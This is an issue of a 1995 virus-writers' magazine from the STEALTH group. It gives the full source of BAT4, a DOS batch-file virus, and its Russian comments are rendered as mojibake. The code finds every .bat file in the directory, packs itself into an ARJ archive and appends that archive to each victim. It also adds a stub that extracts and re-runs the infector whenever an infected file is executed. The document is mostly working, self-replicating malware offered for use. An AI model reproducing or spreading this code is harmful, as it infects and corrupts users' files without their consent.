     ÜÜ                  Û
    ßßß  Virus Magazine  Û Box 10, Kiev 148, Ukraine       XII 1995
    ßÛÛ ßßßßßßßßßßßßßßßß Û ßßßßßßßßßßßßßßßßßßß ß ßßßßÞßßß  ÛßßßßßßÛ
     ÞÛ ÛßÜ Ûßß Üßß Üßß ÜÛÜ Üßß ÛßÛ    Ý Û ÜßÛ Û Üßß ÛÜÜ   Û ÜßßÜ Û 
      Û Û Û Ûß  Ûß  Û    Û  Ûß  Û Û    Û Û Û Û Û Û   Û     Û ÜßßÜ Û
      Û Þ Þ Þ   ÞÜÜ ÞÜÜ  Þ  ÞÜÜ ÞÜß     ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜÜ  Û ßÜÜß Û
      Þ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ  ÛÜÜÜÜÜÜÛ
      (C) Copyright,1994-95,by STEALTH group WorldWide, unLtd.
      ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

‚¨àãá BAT4. Š®¬¬¥­â à¨¨.
------------------------
‡ ¯ãáª âì INSTALL.BAT
------------------------

” ©« I.bat

=== Cut ===
if "%1"=="4" goto s   ; ¥á«¨ ­ á ¢ë§¢ «¨ á ¯ p ¬¥âp®¬ 4 â® § p ¦ ¥¬
for %%b in (*.bat) do call %0 4 %%b ;â¥áâ¨pã¥¬ ¢á¥ ¡ â­¨ª¨ ¨§ ª â «®£ 
goto b                    ; ¯p®¢¥pª¨ § ª®­ç¨«¨áì
:s
if %2==I.BAT goto b       ­ ©¤¥­­ë© ¡ â¨­¨ª ¬ë ? ¢ëå®¤¨¬
arj l %2 >nul             ¢ ª®­æ¥ ¡ â­¨ª  ¥áâì  på¨¢ ?
if errorlevel 1 goto i    ­¥â § p ¦ ¥¬
goto b                    ¥áâì ¢ëå®¤¨¬
:i
ren %2 p >l               ¯p¥¢p é ¥¬ ®p¨£¨­ « ¢ p
arj a j i.bat SG >nul      på¨¢¨pã¥¬ i.bat ¨ SG
copy /b p+SG+j.arj %2>l   ¨ § ¯¨áë¢ ¥¬ ¢ ª®­¥æ ¡ â­¨ª 
del j.arj                 ¤¥«ï¥¬ ¯p®¬¥¦ãâ®ç­ë¥
del ?                     ä ©«ë
:b                        ª®­¥æ ä ©« 


ä ©« SG

§ p ¦¥­­ë© bat­¨ª ¨á¯®«­ï¥âáï

âãâ ªãç  ¯p®¡¥«®¢ ¨ enter'®¢

@echo off      ­  íªp ­ ­¨ç¥£® ­¥ ¯®ª §ë¢ âì
rem BAT4       ¨¬ï ¢¨pãá 
arj x %0 >nul  ¢áªpë¢ ¥¬ á¥¡ï ­  ¯p¥¤¬¥â i.bat ¨ SG
call i         ¯®§ p ¦ ¥¬ ¢á¥å ¢®ªpã£
del sg         ¯®ã¤ «ï¥¬
del i.bat      ¢á¥ «¨è­¥¥
